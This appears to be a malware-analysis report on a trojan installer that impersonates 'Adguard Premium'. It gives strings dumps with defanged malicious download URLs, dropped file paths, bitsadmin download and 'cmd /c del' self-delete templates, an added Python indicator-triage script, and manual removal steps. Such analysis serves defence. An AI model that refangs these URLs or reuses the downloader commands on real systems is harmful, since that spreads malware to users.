C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz5.tmp
Setup__2140_il11.exe
SETUP_~1.EXE
Exec: success (""C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz5.tmp\Setup__2140_il11.exe"")
itor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
Adguard Premium v6.1.245.1212 Setup
5845710
l=hXXp://gurusetman.info/taveara?q=setup&name=Adguard Premium v6.1.245.1212 
thessel.bid/stub_maker_uk2.php?url=hXXp://gurusetman.info/taveara?q=setup&name=Adguard Premium v6.1.245.1212 
dguard Premium v6.1.245.1212
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsm2.tmp\LggJBBE5vd.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsm2.tmp
LggJBBE5vd.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nse3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
3224096
hXXp://VVV.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
hXXp://get.enomenalco.club/launch_v5.php?p=sevenzip&pid=2273&tid=10277909&b_typ=pe&n=QWRndWFyZCBQcmVtaXVtIHY2LjEuMjQ1LjEyMTIg&reb=1&ic=

LggJBBE5vd.exe_1608_rwx_10001000_00007000:

.text
`.rdata
@.data
.rsrc
@.reloc
/key=

Setup__2140_il11.exe_1740:

.text
`.rdata
@.data
.rsrc
@.reloc
j5SSh
8%uEP3
PSSh0\A
xSSSh
FTPjKS
FtPj;S
C.PjRV
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
portuguese-brazilian
operator
GetProcessWindowStation
WinHttpSetStatusCallback
Failed to get the Temp folder: %d
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
CInstallationManager::IsPartOfInstallation value=%s
CInstallationManager::SetComponentInstallationEnded %S
%Y-%m-%d %H:%M:%S
CProgressUpdateRequest::CreateInstance %S
CProgressUpdateRequest::ProgressUpdate %S
Send progress update request %s
Progress Request for '%S' return %s
%c%c%c%c
C:\Amon\AmonSystemBs\BootStrapper\ProductionNoSign\Launcher.pdb
VERSION.dll
KERNEL32.dll
USER32.dll
GDI32.dll
RegDeleteKeyW
RegCloseKey
RegQueryInfoKeyW
RegEnumKeyExW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
Secur32.dll
WinHttpCloseHandle
WinHttpOpen
WinHttpSetOption
WinHttpGetProxyForUrl
WinHttpCrackUrl
WinHttpConnect
WinHttpOpenRequest
WinHttpSetStatusCallback
WinHttpSendRequest
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpReceiveResponse
WINHTTP.dll
GetProcessHeap
GetCPInfo
zcÁ
.?AVAsyncWinHttp@@
.?AV?$_IDispEventLocator@$0MJ@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$IDispEventSimpleImpl@$0MJ@VCBoot@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AUISupportErrorInfo@@
.?AV?$CAtlExeModuleT@VCBootStrapperModule@@@ATL@@
?456789:;<=
!"#$%&'()* ,-./0123
rakis.unblamed.1 = s 'Inst Class'
CLSID = s '{e59781dd-ffd9-4ede-8b1c-043817fa2e37}'
rakis.unblamed = s 'Inst Class'
CurVer = s 'rakis.unblamed.1'
ForceRemove {e59781dd-ffd9-4ede-8b1c-043817fa2e37} = s 'Inst Class'
ProgID = s 'rakis.unblamed.1'
VersionIndependentProgID = s 'rakis.unblamed'
val ServerExecutable = s '%MODULE_RAW%'
TypeLib = s '{38d2a8d3-f52b-4d86-a7b8-d71a1d37ba91}'
.sssh
REÚ
\.crr
s1f-'
.DC l
tweb
<assemblyIdentity type="win32" processorArchitecture="*" version="1.2.1.2" name="win"/>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
<ms_asmv2:requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
stdole2.tlbWWW(
msgWd
keyNameW
urlW
url2d
YtcmdLineW
P%CreateIconWW
iconUrlW
regKeyWW
CheckRegKeyW
keyWd
W.launchCommandLineWWW
~cmdW
WDIsShortNameInstalledd
Created by MIDL version 7.00.0555 at Wed Sep 14 08:38:50 2016
11D1m1
7 8'8.898
9œ9R9r9
6-676=6[6
2"2)20262]2
3-3h4}4
7'80868{8
= >1>\>}>
>->6>_>|>
7 7$7(7~7
9";.;4;9;?;
5 5$5(5,50545
4686<6|6
808<8\8|8
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
wKERNEL32.DLL
ADVAPI32.DLL
WUSER32.DLL
Winhttp.dll
shlwapi.dll
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
appimageurl
cmdl
capp=%s&cid=%s&mhx=%S&base=%s
\bitsadmin.exe
\Support Tools\bitsadmin.exe
%sami%s%d%d.exe
%d-%.2d-%.2dT%.2d:%.2d:00
%d-%.2d-%.2dT%.2d:-:00
/retrynav %d
Advapi32.dll
shell32.dll
{23A96663-59D1-4C44-A0DB-1118D9C4ABBA}
A.tlb
OLEAUT32.DLL
kernel32.dll
sn=%s&hx=%S&base=%s
rfsw%d
advapi32.dll
v2.0.50727
v1.1.4322
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
%ProgramFiles%\Microsoft Silverlight\sllauncher.exe
NT%d.%dSP%d
ami%sExd
bitsadmin /transfer amijob /download /priority high %s %s
ami%sExi
/c del "%s"
cmd.exe
%TEMP%\task.vbs
ami%sExdel
%%X
version.dll
OleAut32.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz5.tmp\Setup__2140_il11.exe
{8856F961-340A-11D0-A96B-00C04FD705A2}
1.1.5.26
setup.exe
millesimalnonremuneration.site
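The strings above are printed in the report's defanged form (hXXp:// for http://, VVV. for www.), and the launch_v5.php URL carries a base64 query value. The following Python is an added example, not part of the Lavasoft report or of the sample itself; it shows how an analyst turns such a dump into indicators: refang the URLs, collect hostnames (including the unencoded appsetupurl nested in the dosecuretrips.com query string and the bare millesimalnonremuneration.site line), base64-decode query values such as the n= parameter, which decodes to the lure name "Adguard Premium v6.1.245.1212", pick up the requireAdministrator manifest line, and flag the bitsadmin, %TEMP%\task.vbs and cmd /c del templates that show the downloaded stub's LOLBin use. The sample input is a constructed excerpt of the dump; the pattern list, the file-extension exclusion and the base64 length threshold are this example's own heuristics, not anything the report states.

```python
import base64
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample: lines copied from the strings dump above, kept in the
# report's defanged form (hXXp:// for http://, VVV. for www.). An excerpt only.
SAMPLE_STRINGS = """\
<ms_asmv2:requestedExecutionLevel level="requireAdministrator" uiAccess="false"/>
User-Agent: NSISDL/1.2 (Mozilla)
hXXp://get.gunnightmar.club/stats.php?bu=
hXXp://get.iestharvest.club/error.php?string=
hXXp://get.enomenalco.club/launch_v5.php?p=sevenzip&pid=2273&tid=10277909&b_typ=pe&n=QWRndWFyZCBQcmVtaXVtIHY2LjEuMjQ1LjEyMTIg&reb=1&ic=
hXXp://VVV.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
bitsadmin /transfer amijob /download /priority high %s %s
%TEMP%\\task.vbs
/c del "%s"
cmd.exe
millesimalnonremuneration.site
"""

DEFANGED_SCHEME = re.compile(r"hXXp(s?)://", re.I)
HOST_IN_URL = re.compile(r"https?://([A-Za-z0-9.-]+)")
# A line that is nothing but a bare hostname (the dump has one such line).
BARE_HOST = re.compile(r"^(?:[A-Za-z0-9-]+\.)+[A-Za-z]{2,}$")
# Windows file extensions that would otherwise look like a TLD ("cmd.exe").
FILE_EXTENSIONS = {"exe", "dll", "tmp", "ini", "log", "vbs", "gif", "png",
                   "htm", "js", "css", "cfg", "tlb", "pdb", "sys", "bat"}
# Looks like base64 and is long enough to be worth decoding (heuristic cut-off).
B64_VALUE = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")
# requestedExecutionLevel from an embedded application manifest.
EXEC_LEVEL = re.compile(r'requestedExecutionLevel\s+level="([^"]+)"')
# Command-line templates that amount to LOLBin abuse when found inside a dropper.
LOLBIN_PATTERNS = (
    ("bitsadmin download", re.compile(r"bitsadmin\s+/transfer\b.*/download", re.I)),
    ("script in %TEMP%", re.compile(r"%TEMP%\\\S+\.vbs", re.I)),
    ("cmd self-delete", re.compile(r'/c\s+del\s+"', re.I)),
)


def refang(text: str) -> str:
    """Turn the report's hXXp:// and VVV. notation back into real URLs."""
    text = DEFANGED_SCHEME.sub(lambda m: "http" + m.group(1).lower() + "://", text)
    return text.replace("://VVV.", "://www.")


def decode_b64_query_values(url: str) -> dict:
    """Return {param: decoded} for query values that decode to printable UTF-8."""
    decoded = {}
    for key, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if len(value) % 4 or not B64_VALUE.match(value):
            continue
        try:
            text = base64.b64decode(value, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            continue
        if text.isprintable():
            decoded[key] = text
    return decoded


def triage(strings_dump: str) -> dict:
    """Pull hosts, decoded query values, manifest elevation and LOLBin templates."""
    hosts, exec_levels, decoded, lolbins = set(), set(), {}, []
    for raw in strings_dump.splitlines():
        line = refang(raw.strip())
        if not line:
            continue
        # findall also catches nested, unencoded URLs (appsetupurl=http://...).
        hosts.update(h.lower() for h in HOST_IN_URL.findall(line))
        if BARE_HOST.match(line) and line.rsplit(".", 1)[1].lower() not in FILE_EXTENSIONS:
            hosts.add(line.lower())
        if line.startswith("http"):
            params = decode_b64_query_values(line)
            if params:
                decoded[line] = params
        exec_levels.update(EXEC_LEVEL.findall(line))
        for label, pattern in LOLBIN_PATTERNS:
            if pattern.search(line):
                lolbins.append((label, line))
    return {
        "hosts": sorted(hosts),
        "execution_levels": sorted(exec_levels),
        "decoded_params": decoded,
        "lolbins": lolbins,
    }


if __name__ == "__main__":
    result = triage(SAMPLE_STRINGS)
    print("hosts:", ", ".join(result["hosts"]))
    print("execution levels:", result["execution_levels"])
    for url, params in result["decoded_params"].items():
        print("decoded:", params, "in", url[:60])
    for label, line in result["lolbins"]:
        print("lolbin:", label, "->", line)
```

The hostnames are what you would block or hunt for in proxy logs; the decoded n= value tells you which software the installer impersonated; the LOLBin lines give process-creation detections (bitsadmin /transfer with /download, a .vbs under %TEMP%, cmd /c del on the dropper's own path) that survive a change of download domains. The bare-hostname rule needs the extension exclusion, otherwise "cmd.exe" is reported as a host.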


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager). The automated analysis lists no created processes, but the dumps above were taken from %original file name%.exe (PID 616), LggJBBE5vd.exe (PID 1608) and Setup__2140_il11.exe (PID 1740), and the installer log string "Exec: success" confirms that Setup__2140_il11.exe was launched, so check for those names in Task Manager before deleting files.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\launch_reb[1].htm (178 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\580019566fa41[1].exe (5224 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp\inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp\LggJBBE5vd.exe (5224 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp\6j6GOciRXw (178 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu4.tmp (1568 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\Setup__2140_il11.exe (55260 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\NSISdl.dll (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\nsArray.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\635845710 (871 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\decline[1].gif (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\next[1].gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\footer_img[1].png (937 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\main[1].css (1177 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\cancel1[1].gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\logo[1].png (2150 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\accept[1].gif (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\cancel[1].gif (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\skip[1].gif (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\dm_left_image[1].png (1928 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\amipb[1].js (29529 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\index[1].htm (7480 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (31 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\finish[1].gif (2 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
